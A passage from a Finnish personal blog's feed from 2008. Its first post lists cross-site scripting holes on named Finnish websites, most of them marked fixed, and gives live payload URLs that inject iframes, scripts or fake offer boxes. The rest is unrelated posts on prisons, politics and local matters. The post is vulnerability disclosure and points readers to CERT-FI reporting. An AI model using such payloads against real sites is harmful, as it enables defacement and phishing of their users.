        Taloussanomien uutiskommentoinnin kautta voi sivustolle kirjoittaa mitä tahansa haittakoodia. Esimerkki lataa sivun päälle poliisi.fi-sivuston. Myös taloussanomien tagi-sivu vuotaa vähän, mutta ihan XSS:ksi asti <a href="http://www.omasana.fi/sana/oma%20%3Cu%3Ealleviivaus" onclick="javascript:urchinTracker ('/outbound/article/www.omasana.fi');">tästä ei ole</a>.
    </li>
<li>
        <a href="http://www.tietokone.fi/foorumi/tulos.asp?viesti=%22%2F%3E%3Ciframe+border%3D%220%22style%3D%22min%2Dheight%3A1000px%3Btop%3A0%3Bbottom%3A0%3Bleft%3A0%3Bwidth%3A1024px%3Bright%3A0%3Bdisplay%3Ablock%3Bposition%3Aabsolute%3B%22src%3D%22http%3A%2F%2Fwww%2Epoliisi%2Efi%22%3E%3C%2Fiframe%3E" onclick="javascript:urchinTracker ('/outbound/article/www.tietokone.fi');"><b>Tietokone.fi</b></a> (korjattu<!--31.3.-->)<br />
        Tuo <a href="http://www.tietokone.fi/uutta/hakutulos.asp?hakusana=xss+%22%2F%3E%3Ciframe+border%3D%220%22style%3D%22min%2Dheight%3A1000px%3Btop%3A0%3Bbottom%3A0%3Bleft%3A0%3Bwidth%3A1024px%3Bright%3A0%3Bdisplay%3Ablock%3Bposition%3Aabsolute%3B%22src%3D%22http%3A%2F%2Fwww%2Epoliisi%2Efi%22%3E%3C%2Fiframe%3E" onclick="javascript:urchinTracker ('/outbound/article/www.tietokone.fi');">aiempi aukko</a> osoittautuikin vähän tehottomaksi, mutta uusi löytyi pienellä vaivalla. Tuo sivuston hakuboxi siis sallii html:n lisäämisen sivustolle, mutta vain keksien kautta, joten XSS-hyökkäyksessä sellaista on hankala hyödyntää. Uusi aukko antaa kirjoittaa mitä tahansa sisältöä sivustolle. Esimerkki lataa poliisi.fi-sivuston tietokone-sivun päälle.</p>
<p>        <strike>Tietokone-lehden sivustolla on alkeellinen hakukentän &#8220;XSS-karkaus&#8221;. Tämä on siitä ikävä, että sivusto tallentaa haut selaimeen, jolloin bugista ei pääse eroon. Tuon linkin jälkeen www.tietokone.fi siis näyttää aina poliisilta. ;-)</strike>
    </li>
<li>
        <a href="http://www.iltalehti.fi/nettitv/?%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22T%C3%A4lt%C3%A4%20sivustolta%20on%20l%C3%B6ytynyt%20XSS-haavoittuvuus.%22);document.write(%22%3Ch1%3ESivustolta%20on%20loytynyt%20XSS-haavoittuvuus%3C/h1%3E%3C!--%22);%3C/script%3E%3Ciframe" onclick="javascript:urchinTracker ('/outbound/article/www.iltalehti.fi');"><b>Iltalehti</b></a> (korjattu<!--31.3.-->)<br />
        Haavoittuvuuden avulla voidaan ladata mitä tahansa sisältöä Iltalehti.fi-sivuston sisälle. Esimerkissä näytetään selaimen varoitus ja kirjoitetaan iso teksti keskelle sivua.
    </li>
<li>
        <a href="https://www.grafia.fi/index.php?search=%22%3E%3Ciframe%20border=%220%22%20style=%22display:block;position:absolute;min-height:1000px;top:0;margin:0;padding:0;bottom:0;left:0;%20width:1380px;right:0;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E%3Ciframe%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.grafia.fi');"><b>Grafia</b></a> (korjattu<!--1.4.-->)<br />
        Graafisen suunnittelun ammattilaisten järjestö, Grafia ry on XSS-haavoittuvainen. Sivustolle on hakukentän kautta mahdollista kirjoittaa mitä tahansa haittakoodia. Sivusto salaa yhteyden (https). Esimerkki lataa sivun päälle poliisi.fi:n.
    </li>
<li>
        <a href="http://www.blogilista.fi/info.php?id=%3Ciframe%20border=%220%22%20style=%22display:block;position:absolute;min-height:1000px;top:0;margin:0;padding:0;bottom:0;left:0;%20width:1380px;right:0;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E%3Ciframe%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.blogilista.fi');"><b>Blogilista.fi (Sanoma Digital Oy)</b></a> (korjattu<!--1.4.-->)<br />
        Sivustolle voidaan kirjoittaa mitä tahansa haittakoodia. Esimerkki lataa poliisi.fi-sivuston blogilistan päälle, joskin sijoittelu vähän mättää: en ehtinyt käyttää hienosteluun aikaa.
    </li>
<li>
        <a href="http://sektori.com/?tpl=forgotPassword&#038;email=%22%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1380px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E" onclick="javascript:urchinTracker ('/outbound/article/sektori.com');"><b>Sektori.com</b></a> (korjattu<!--30.3.-->)<br />
        Salasanamuistutuslomakkeen kautta voidaan sivustolle kirjoittaa mitä tahansa haittakoodia. Esimerkki lataa poliisi.fi-sivuston sektorin päälle.
    </li>
<li>
        <a href="http://www.prh.fi/fi/yrityskiinnitykset/rasitustodistustilaus.html.stx?BE.Form.Input=%22%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1274px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.prh.fi');"><b>Patentti- ja rekisterihallitus</b></a> (korjattu<!--31.3.-->)<br />
        PRH-sivustolla lomakkeelle voi syöttää mitä koodia tahansa &#8220;esitäytettäväksi&#8221;. Esimerkki lataa poliisi.fi-sivuston PRH:n päälle.
    </li>
<li>
        <a href="http://www.pingstate.nu/foorumi/%22%3E%3Cdiv%20style=%22display:block;width:1000px;height:1000px;z-index:1;position:absolute;background:red;%22%3EXSS-haavoittuvuus.%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.pingstate.nu');"><b>Pingstate.nu-yhteisösivu</b></a> (korjattu<!--30.3.-->)<br />
        Sivusto antaa kirjoittaa mitä tahansa haittakoodia. Esimerkissä Punainen laatikko &#8220;XSS-haavoituvuus&#8221;-tekstillä.
    </li>
<li>
        <a href="http://front.phs.fi/p/netposti08/lomake2.html?virhe=1&#038;ver=fi&#038;toive=spam&#038;x=66&#038;y=18&#038;ika=15-25&#038;nimi=%22%3E%3Cdiv%20style=%22width:380px;font-size:25px;line-height:35px;color:black;background:white;padding:67px%2030px;position:absolute;top:270px;left:570px;text-align:center;%22%3ESadalle%20hakijalle%20ilmainen%20tietokone!%20Vastaa%20nopeasti,%20tietokoneita%20jaljella:%20%3Cb%3E14%3C/b%3E%20%3Cspan%20style=%22font-size:13px;%22%3E(tilanne%201.4.2008)%3C/span%3E%3C/div%3E%3Cspan%20id=%22xss" onclick="javascript:urchinTracker ('/outbound/article/front.phs.fi');"><b>Postin kampanja / PHS</b></a> (korjattu)<br />
        PHS-mainostoimiston toteuttamassa kampanjassa postille on lomakkeenkäsittelyssä puute, joka sallii minkä tahansa koodin kirjoittamisen sivuille. Esimerkissä pieni aprillipila. :-)
    </li>
<li>
    <a href="http://www.verkkokauppa.com/?page=http://www.verkkokauppa.com/main.php?path=unohditko" onclick="javascript:urchinTracker ('/outbound/article/www.verkkokauppa.com');"><b>Verkkokauppa.com</b></a> (korjattu<!--3.4.-->)<br />
    Verkkokaupan salasanamuistutus-lomake ei tarkista vastaanottamaansa POST-arvoa. Sivustolle voi kirjoittaa mitä tahansa haittakoodia.  En vielä ehtinyt rakentamaan javascript-formia, joka ensin avaisi tuon sivun, sitten lähettäisi post-käskyn uuden ikkunan oikeaan frameen. Pelkälle framesetille kun post-käskyä ei voi lähettää - eli sikäli aukko on vähän mutkan kautta käytettävissä. Voitte testata sitä kirjoittamalla sähköpostikenttään:<br />
    &lt;h1 style=&#8221;color:red&#8221;&gt;Tässä on XSS-aukko&lt;/h1&gt;</p>
<p>    Tämä on siitä vaarallinen aukko, että crakkeri pystyisi väärentämään esim. jonkin halvan tuotteen sivustolle, sekä myös maksupainikkeet - ja sitä kautta urkkimaan käyttäjältä pankkitunnukset/henkilökohtaisia tietoja/luottokorttitiedot jne.
    </li>
<h3 name="post">POST-arvojen käsitelyvirhe -XSS-aukot</h3>
<p>Nämä ovat siitä vaarallisia, ettei sivuston osoite näytä laisinkaan epäilyttävältä koodisotkulta. Toisaalta näitä ei voi jakaa ihan normaalisti osoitteina, mutta mitä sitten? HTML:nä sähköpostissa ja nettisivuilla nämä ovat silti vaarallisia. Nämä linkit ovat siis oikeasti lomake-nappeja, mutta tavallinen käyttäjä ei sitä välttämättä huomaa.</p>
<li>Lue näistä lisää <a href="http://www.ihminen.org/xss/#post" >lista-sivulta</a>, en voinut sisällyttääkään kaikkea koska piti käyttää vähän erikoisempaa -tekniikkaa XSS-aukkojen metsästykseen.</li>
</ol>
<hr />
<p><i>Listaa päivitetty viimeksi 19.4.2008</i></p>
<p><h3>Uutiset &amp; linkit</h3>
<ul>
<li><b>30.3.<!-- ??:?? --></b> - <a href="http://www.ksml.fi" onclick="javascript:urchinTracker ('/outbound/article/www.ksml.fi');">Keskisuomalaiseen</a> on tulossa huomenna (ma) juttua tästä aiheesta etusivulle. Toimittaja haastatteli tänään ja kuviakin otettiin.</li>
<li><b>31.3.<!-- 12:00 --></b> - Keskustelua aiheesta mm. <a href="http://www.pingstate.nu/linkit/170120" onclick="javascript:urchinTracker ('/outbound/article/www.pingstate.nu');">pingstatessa</a>.</li>
<li><b>31.3.<!-- 12:45 --></b> - Osoitteessa <a href="http://xss.dy.fi/" onclick="javascript:urchinTracker ('/outbound/article/xss.dy.fi');">xss.dy.fi</a> on lisää listattuna XSS-haavoittuvuuksia suomalaisilla sivustoilla.</li>
<li><b>31.3.<!-- 12:55 --></b> - Lisää haavoittuvuuksia osoitteessa <a href="http://piru.dyndns.org/~p/xss.txt" onclick="javascript:urchinTracker ('/outbound/article/piru.dyndns.org');">piru.dyndns.org/~p/xss.txt</a>.</li>
<li><b>31.3.<!-- 13:38 --></b> - Keskisuomalaisen juttu luettavissa lyhennettynä myös ksml.netissä: <a href="http://www.ksml.fi/uutiset/keski-suomi/suurten-sivut-reikäjuustoa(99416).ece" onclick="javascript:urchinTracker ('/outbound/article/www.ksml.fi');">Suurten yritysten verkkosivut reikäjuustoa</a>. Koko juttu <a href="http://www.ihminen.org/xss/ksml_2008-03-31_suurten_sivut_reikajuustoa.pdf" >PDF:nä</a> (15mt, klikkaa oikealla napilla linkkiä ja valitse &#8220;Save as / Tallenna nimellä&#8221;)</li>
<li><b>31.3.<!-- 18:59 --></b> - Vierityspalkki <a href="http://vierityspalkki.wordpress.com/2008/03/31/xss-aukot-verkkopalveluiden-riesana/" onclick="javascript:urchinTracker ('/outbound/article/vierityspalkki.wordpress.com');">kirjoitti jutun aiheesta</a>. Jutussa on runsaasti hyviä linkkejä tietolähteisiin.</li>
<li><b>1.4.</b> - Muropaketin <a href="http://keskustelu.plaza.fi/muropaketti/bbs/t528773" onclick="javascript:urchinTracker ('/outbound/article/keskustelu.plaza.fi');">keskustelualueella aiheesta</a>, sekä muutamia haavoittuvuuksia listattuna.</li>
</ul>
<h3>Jos löydän haavoittuvuuden?</h3>
<p>
Ilmoita asiasta sivuston ylläpitäjälle sekä CERT-FI:lle osoitteeseen <a href="mailto:cert@ficora.fi">cert@ficora.fi</a>. Voit myös halutessasi julkaista aukon tällä listalla (ks. yhteystiedot) tai <a href="http://xss.dy.fi/" onclick="javascript:urchinTracker ('/outbound/article/xss.dy.fi');">xss.dy.fi</a>-wikissä.
</p>
<p><h3>Lisätietoja:</h3>
<p>    Mikael Korpela, Jyväskylä<br />
    Graafikko &amp; www-suunnittelija<br />
    mikael@ihminen.org<br />
    <a href="http://www.ihminen.org" >www.ihminen.org</a><br />
    <a href="http://www.ihminen.org/yhteystiedot/" >www.ihminen.org/yhteystiedot/</a> (tarkemmat yhteystiedot)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/03/30/listaus_xss-haavoittuvuuksista_suomessa/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Epäinhimmillistä kohtelua Suomen vankiloissa</title>
		<link>http://www.ihminen.org/blogi/2008/03/20/epainhimmillista-kohtelua-suomen-vankiloissa/</link>
		<comments>http://www.ihminen.org/blogi/2008/03/20/epainhimmillista-kohtelua-suomen-vankiloissa/#comments</comments>
		<pubDate>Wed, 19 Mar 2008 23:55:16 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Filosofia &amp; ihmettely</category>

		<category>Politiikka</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/03/20/epainhimmillista-kohtelua-suomen-vankiloissa/</guid>
		<description><![CDATA[13.3.2008 esitetyssä Silminnäkijässä 20 vuoden vankeustuomiota istuva Eikka Lehtosaari kertoo, miten Suomessa vankeja oikeasti kohdellaan.
Tarinat paskaisista selleistä eivät juurikaan eroa Oikeutta eläimille -järjestön julkaisemista videoista tuotantoeläinten kohtelusta. Jos tuotantoeläinten kohdalla olikin kyse vain yksittäistapauksista - mitä epäilen, koska lakikaan koko asian osalta ei ole eläinystävällinen - niin miten on asianlaita Lehtosaaren ja kumppaneiden kohdalla?
Lehtosaaresta saa [...]]]></description>
			<content:encoded><![CDATA[<p>13.3.2008 esitetyssä Silminnäkijässä 20 vuoden vankeustuomiota istuva Eikka Lehtosaari kertoo, miten Suomessa vankeja oikeasti kohdellaan.</p>
<p>Tarinat paskaisista selleistä eivät juurikaan eroa Oikeutta eläimille -järjestön julkaisemista videoista tuotantoeläinten kohtelusta. Jos tuotantoeläinten kohdalla olikin kyse vain yksittäistapauksista - mitä epäilen, koska lakikaan koko asian osalta ei ole eläinystävällinen - niin miten on asianlaita Lehtosaaren ja kumppaneiden kohdalla?</p>
<p>Lehtosaaresta saa raportaasissa hyvinkin älykkään kuvan, väkivaltaisista teoistaan huolimatta. Miehellä on selkeästi ollut aikaa miettiä ja toisaalta monet väkivallanteot ovat selkeästi olleet seurausta vakavista psyykkisistä ongelmista.</p>
<p>Pari otetta:</p>
<blockquote><p><em>Polvella painettiin päätä lattiaan - turvasaappalla. Sitten roikotettiin puoltoista tuntia käsiraudoissa kahlittuna. Alasti.</em> - Jere Lehtinen</p></blockquote>
<blockquote><p><em>Me asuttiin jossain vaiheessa olosuhteissa missä ei pystyny kunnolla hengittämään. Palvelu pelas yhteen suuntaan vaan, eli ruoka tuotiin lautasella kolmesti päivässä ja mitään ei saatu ulos. Eli se kaikki ne jätteet keräänty meidän selliin. Vessanpönttöjä ei vedetty ja niin edelleen. Siellä rupes olee aika kova dunkkis. Lopulta se huipentu siihen että vartija kanto lapiolla sitä paskaa meidän selleihin - heitteli sitä seinille ja me sitten asuttiin niissä tiloissa. Me ei päästy peseytymään yli kahtee kuukauteen, meille ei annettu vaihtovaatteita yli kahteen kuukauteen. Se muu kohtelu noudatteli tätä samaa linjaa.</em><br />
- Eikka Lehtosaari</p></blockquote>
<p>Ja niin edelleen: pahoinpidellyt eivät saa lääkärinlausuntojaan, valvontakamerakuvia ei tutkita, kanteluihin ei reagoida&#8230; vankiloiden lainvastaiset menetelmät muuttuivat jonkin verran ohjelmanteon aikana.</p>
<p>Reportaasi &#8220;Pahan palkka&#8221; on nähtävissä <a href="http://areena.yle.fi/toista?id=1144794" title="Silminnäkijä 13.3. - Pahan palkka" onclick="javascript:urchinTracker ('/outbound/article/areena.yle.fi');">Ylen Areenalla</a>.</p>
<p>Minkähän näille nyt oikein mahtaisi?
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/03/20/epainhimmillista-kohtelua-suomen-vankiloissa/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Kansanedustajan pimeä puoli</title>
		<link>http://www.ihminen.org/blogi/2008/03/18/kansanedustajan-pimea-puoli/</link>
		<comments>http://www.ihminen.org/blogi/2008/03/18/kansanedustajan-pimea-puoli/#comments</comments>
		<pubDate>Mon, 17 Mar 2008 21:28:12 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Filosofia &amp; ihmettely</category>

		<category>Media</category>

		<category>Politiikka</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/03/18/kansanedustajan-pimea-puoli/</guid>
		<description><![CDATA[Voi helkkari kun osaa ihmiset olla kaksinaamaisia. Bjarne Kallis kenraali Gustav Hägglundin säestyksellä hokee Uralin perhosesta, että nyt on ihmisiä loukattu. Eikä Marskin biseksuaalisuus suinkaan Bjarnea tai Gustavia loukkaa (eipä)&#8230; kunhan vain mesoavat siitä että veteraaneja on ehdointahdoin lähdetty häpäisemään. Eivät vaan kehtaa sanoa mitä oikeasti ajattelevat seksuaalisista vähemmistöistä.
Täytyy kyllä todeta Katariina Lillqvistin olevan nero. [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.ihminen.org/wp-content/uploads/uralin_perhonen_marsalkka_mannerheim_ja_kuolema.jpg" ><img id="image399" src="http://www.ihminen.org/wp-content/uploads/uralin_perhonen_marsalkka_mannerheim_ja_kuolema.thumbnail.jpg" alt="Uralin perhonen - Marsalkka Mannerheim ja Kuolema" style="float: right; margin: 0 0 5px 10px;" /></a>Voi helkkari kun osaa ihmiset olla kaksinaamaisia. Bjarne Kallis kenraali Gustav Hägglundin säestyksellä hokee <i>Uralin perhosesta</i>, että nyt on ihmisiä loukattu. Eikä Marskin biseksuaalisuus suinkaan Bjarnea tai Gustavia loukkaa (eipä)&#8230; kunhan vain mesoavat siitä että veteraaneja on ehdointahdoin lähdetty häpäisemään. Eivät vaan kehtaa sanoa mitä oikeasti ajattelevat seksuaalisista vähemmistöistä.</p>
<p>Täytyy kyllä todeta Katariina Lillqvistin olevan nero. Sadulla sisällissodan haavoista hän onnistuukin löytämään Suomalaisista yllättävän vahvan ja edelleenkin yleisen homokammon.</p>
<p>No, mitäpä minä höpisen. Katsokaa leffa ja A-talk niin voitte itse tehdä päätelmänne keskustelusta. Ohjaaja Katariina Lillqvist, kenraali Gustav Hägglund ja poliitikot Minna Sirnö ja Bjarne Kallis - <a href="http://www.yle.fi/elavaarkisto/?s=s&#038;g=4&#038;ag=22&#038;t=&#038;a=5207" onclick="javascript:urchinTracker ('/outbound/article/www.yle.fi');">A-talk väittelee Marski-animaatiosta</a>. (Ohjelmassa myös klippejä leffasta, nimenomaan Ne kohtaukset)
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/03/18/kansanedustajan-pimea-puoli/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Enemmän viinaa</title>
		<link>http://www.ihminen.org/blogi/2008/02/20/enemman-viinaa/</link>
		<comments>http://www.ihminen.org/blogi/2008/02/20/enemman-viinaa/#comments</comments>
		<pubDate>Wed, 20 Feb 2008 17:01:51 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Media</category>

		<category>Linkkivinkit</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/02/20/enemman-viinaa/</guid>
		<description><![CDATA[Eilisissä Ylen klo 18 uutisissa oli hauska aloituslause: &#8220;Suomalaiset joivat viimevuona viinaa taas enemmän kuin ennen&#8221;. Seuraavaan uutislähetykseen se oli jo muutetty tylsempään &#8220;alkoholin kulutus on kasvanut&#8221;-muotoon. Kuuden uutiset voi katsoa areenalta.
Keskisuomalainen ivaili tänään Ylelle kysymällä päivän netti-kysymyksenä: juotko enemmän viinaa kuin koskaan? Kyllä / Ei.
Muita huomioita netistä:
Jyväskyläläinen Tapani Tarvainen on tehnyt kantelun internetaktivisti Matti [...]]]></description>
			<content:encoded><![CDATA[<p>Eilisissä Ylen klo 18 uutisissa oli hauska aloituslause: &#8220;Suomalaiset joivat viimevuona viinaa taas enemmän kuin ennen&#8221;. Seuraavaan uutislähetykseen se oli jo muutetty tylsempään &#8220;alkoholin kulutus on kasvanut&#8221;-muotoon. Kuuden uutiset voi katsoa <a href="http://areena.yle.fi/toista?id=1097711" onclick="javascript:urchinTracker ('/outbound/article/areena.yle.fi');">areenalta</a>.</p>
<p>Keskisuomalainen ivaili tänään Ylelle kysymällä päivän netti-kysymyksenä: juotko enemmän viinaa kuin koskaan? Kyllä / Ei.</p>
<p>Muita huomioita netistä:</p>
<p>Jyväskyläläinen <a href="http://www.tapanitarvainen.fi/" onclick="javascript:urchinTracker ('/outbound/article/www.tapanitarvainen.fi');">Tapani Tarvainen</a> on <a href="http://www.ksml.fi/uutiset/keski-suomi/jyväskyläläinen-kanteli-verkkosensuurista(77078).ece" onclick="javascript:urchinTracker ('/outbound/article/www.ksml.fi');">tehnyt kantelun</a> internetaktivisti Matti Nikin sivuston sensuroinnista.</p>
<p><a href="http://www.almamedia.fi/tiedote?tiedote=10753" onclick="javascript:urchinTracker ('/outbound/article/www.almamedia.fi');">Almamedia on ostanut Telkku.comin</a>. Minusta erityisen kiinnostava on tämä kohta: <em>Tavoitteenamme on myös vahvistaa Telkku.comin asemaa yhteisöllisenä mediana ja nostaa se Suomen kolmen suurimman verkkoyhteisöpalvelun joukkoon.</em></p>
<p>Nykyäänhän telkku.comin &#8220;yhteisöllisyys&#8221; on lähinnä kuihtuvaa keskustelua tv-ohjelmista, eikä keskustelun taso edes ole niin korkeaa että sitä voisi sanoa keskusteluksi. Saapa siis nähdä mitä tekevät, ihan mielenkiinnolla täällä odotetaan uusia avauksia melko kuumana käyvillä yhteisösivustojen markkinoilla. Saattavat muutenkin tarkoittaa &#8220;kolmen suurimman <i>suomalaisen</i> joukkoon&#8221;. Jokatapauksessa: jotain uutta ja repäisevää tekisi mieli nähdä Suomessakin, vaikka idikset sitten haettaisiinkin ulkomailta.
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/02/20/enemman-viinaa/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Onnea uudelle kunnalle!</title>
		<link>http://www.ihminen.org/blogi/2008/02/18/onnea-uudelle-kunnalle/</link>
		<comments>http://www.ihminen.org/blogi/2008/02/18/onnea-uudelle-kunnalle/#comments</comments>
		<pubDate>Mon, 18 Feb 2008 19:39:26 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Media</category>

		<category>Linkkivinkit</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/02/18/onnea-uudelle-kunnalle/</guid>
		<description><![CDATA[Jyväskylästä tulee mahdollisesti iltaisen valtuuston päätöksen myötä Suomen seitsemänneksi suurin kunta väkiluvussa mitattuna. Onnea sen johdosta!
Harmittaa, kun jäi Erkan kännyvideo-streaming näkemättä. Sille olisi vaikka kuinka moni blogi vinkannut, jos olisin hoksannut päivän aikana vain vilkaista blogilistaa&#8230;
Hieno esimerkki kuitenkin toimivasta kansalaismediasta. Streamille ehti kertyä varsin monipäinen yleisö.
Mitä lie muita käyttömahdollisuuksia tuollaisella olisi? Olisi hienoa saada tänne [...]]]></description>
			<content:encoded><![CDATA[<p>Jyväskylästä tulee mahdollisesti iltaisen <a href="http://www.hs.fi/kotimaa/artikkeli/Jyväskylä+ja+Korpilahti+hyväksyivät+suur-Jyväskylän+kuntaliitoksen/1135234165288" onclick="javascript:urchinTracker ('/outbound/article/www.hs.fi');">valtuuston päätöksen</a> myötä Suomen seitsemänneksi suurin kunta väkiluvussa mitattuna. Onnea sen johdosta!</p>
<p>Harmittaa, kun jäi Erkan <a href="http://erkka.vuodatus.net/blog/1127367" onclick="javascript:urchinTracker ('/outbound/article/erkka.vuodatus.net');">kännyvideo-streaming</a> näkemättä. Sille olisi vaikka kuinka moni blogi vinkannut, jos olisin hoksannut päivän aikana vain vilkaista blogilistaa&#8230;</p>
<p>Hieno esimerkki kuitenkin toimivasta kansalaismediasta. Streamille ehti kertyä varsin monipäinen yleisö.</p>
<p>Mitä lie muita käyttömahdollisuuksia tuollaisella olisi? Olisi hienoa saada tänne toimiva kansalaismedia, sellainen, johon käyttäjät voisivat itse streamingin lisäksi lähettää valokuvia, tekstejä ja videonpätkiä kaupungista. Huomioita, tunnelmakuvaa ja informaatiota (tapahtumat, onnettomuudet, kummalliset pikkujutut, poliittiset tempaukset yms.) Sisältöä varmasti riittäisi, kun vain homman saisi pelittämään tarpeeksi helppokäyttöisenä ja ylipäätänsä ihmisiä pyörittämään sellaista. Kulkurissa olisi siihen potentiaalia, mutta se vain lepää laakereillaan aika/ihmispulan vuoksi&#8230;</p>
<p>Ehkäpä joku flickr:n, youtuben, googlemapsin yms. palvelut yhdistävä mashup-nettisivusto? Voisin melkein kuvitella että sellaisen rakentaminen olisi mahdollista jo pelkästään WordPressin (tämän blogisoftan) plugareilla.</p>
<p>Toivottavasti hesari lähtee viemään <a href="http://omakaupunki.hs.fi/" onclick="javascript:urchinTracker ('/outbound/article/omakaupunki.hs.fi');">omakaupunki.hs.fi</a> -palveluaan siihen suuntaan - ja mikä parasta, laajentaisi sen kattamaan koko maan.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/02/18/onnea-uudelle-kunnalle/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Jehovista ja kyttäämisestä</title>
		<link>http://www.ihminen.org/blogi/2008/02/02/jehovista-ja-kyttaamisesta/</link>
		<comments>http://www.ihminen.org/blogi/2008/02/02/jehovista-ja-kyttaamisesta/#comments</comments>
		<pubDate>Sat, 02 Feb 2008 09:53:31 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Filosofia &amp; ihmettely</category>

		<category>Arki</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/02/02/jehovista-ja-kyttaamisesta/</guid>
		<description><![CDATA[Meillä on käynyt oven takana todella ahkerasti Jehovan todistajia ja mulla on asiasta mielipide.
Olen aina kummeksunut Jehovien tapaa kutsua ovelta ovelle kiertämistä &#8220;vapaaehtoistyöksi&#8221;, sikäli kun seurakunta velvoittaa jäseniään siihen - joissakin käsittääkseni jopa tarkoilla tuntimäärillä. Lusmuilijoita sensijaan paheksutaan, joten kiertämiselle on sosiaalinen paine. (Luin joskus ex-Jehovien blogeja ja kotisivuja.)
Tänään en jaksanut avata näille ovea. Nautin [...]]]></description>
			<content:encoded><![CDATA[<p>Meillä on käynyt oven takana todella ahkerasti Jehovan todistajia ja mulla on asiasta mielipide.</p>
<p>Olen aina kummeksunut Jehovien tapaa kutsua ovelta ovelle kiertämistä &#8220;vapaaehtoistyöksi&#8221;, sikäli kun seurakunta velvoittaa jäseniään siihen - joissakin käsittääkseni jopa tarkoilla tuntimäärillä. Lusmuilijoita sensijaan paheksutaan, joten kiertämiselle on sosiaalinen paine. (Luin joskus ex-Jehovien blogeja ja kotisivuja.)</p>
<p>Tänään en jaksanut avata näille ovea. Nautin kupista kahvia NYTin kera ja päivä oli parhaimmillaan, kun kuulin rappukäytävästä jotain supattelua. Näin aina: mutta ei se mitään että ne supattelevat viitisen minuuttia ennen ovikellon soittamista, tyttöpari supatteli oven takana vielä 20 minuuttia ovikellon soittamisen jälkeenkin!</p>
<p>Mitä ne siellä höpöttävät? Kyttäävätkö ne että kuuluuko täältä meteliä? (Teki mieli kolistella vaikka tiskejä tai jotain, että olisivat voinee soitella lisää ovikelloa - mii so eevil). Lopulta sitten jättivät heippalapun ja uhkasivat palata pian takaisin. <i>Keskustelisin mielelläni kanssasi siitä, mitä Raamattu kertoo Eedenin tapahtumista ja siitä, mitä Jumalan tarkoitus on Maan suhteen.</i>.</p>
<p>Ensi kerralla lupaan avata ja ehkä kysyäkin tuosta supattelusta.
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ihminen.org/blogi/2008/02/02/jehovista-ja-kyttaamisesta/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Lähetä meille teoksesi</title>
		<link>http://www.ihminen.org/blogi/2008/01/30/laheta-meille-teoksesi/</link>
		<comments>http://www.ihminen.org/blogi/2008/01/30/laheta-meille-teoksesi/#comments</comments>
		<pubDate>Wed, 30 Jan 2008 12:05:34 +0000</pubDate>
		<dc:creator>Mikael</dc:creator>
		
		<category>Media</category>

		<category>Linkkivinkit</category>

		<category>Duuni</category>

		<guid isPermaLink="false">http://www.ihminen.org/blogi/2008/01/30/laheta-meille-teoksesi/</guid>
		<description><![CDATA[Viimepäivät ovat menneet Päivin lailla apurahahakemusten parissa. Phuh! Ja jotkut tekee näitä työkseen&#8230; Aiheeseen liittyen: YLE: Taiteilija-apurahojen jakoperiaatteet muuttumassa. Ihme sanahelinää tuo taas, vai mitä ihmettä tarkoittaa &#8220;&#8230;taiteilijatukijärjestelmä vaikuttaakin olevan siirtymässä puhtaasta laatuajattelusta kohti jonkinlaista sosiaalista oikeudenmukaisuutta&#8221;?
Jokatapauksessa, tervetuloa katselemaan ja ennenkaikkea osallistumaan. Levittäkää viestiä eteenkinpäin:
Live Herring 2008
Jyväskylän taidemuseo / The Jyväskylä Art Museum
29.10. - 16.11. [...]]]></description>
			<content:encoded><![CDATA[<p>Viimepäivät ovat menneet <a href="http://sanasto.blogspot.com/2008/01/dears-bandwagoneers.html" onclick="javascript:urchinTracker ('/outbound/article/sanasto.blogspot.com');">Päivin</a> lailla apurahahakemusten parissa. Phuh! Ja jotkut tekee näitä työkseen&#8230; Aiheeseen liittyen: <a href="http://yle.fi/uutiset/24h/id80807.html" onclick="javascript:urchinTracker ('/outbound/article/yle.fi');">YLE: Taiteilija-apurahojen jakoperiaatteet muuttumassa</a>. Ihme sanahelinää tuo taas, vai mitä ihmettä tarkoittaa &#8220;&#8230;taiteilijatukijärjestelmä vaikuttaakin olevan siirtymässä puhtaasta laatuajattelusta kohti jonkinlaista sosiaalista oikeudenmukaisuutta&#8221;?</p>
<p>Jokatapauksessa, tervetuloa katselemaan ja ennenkaikkea osallistumaan. Levittäkää viestiä eteenkinpäin:</p>
<p><strong>Live Herring 2008<br />
Jyväskylän taidemuseo / The Jyväskylä Art Museum<br />
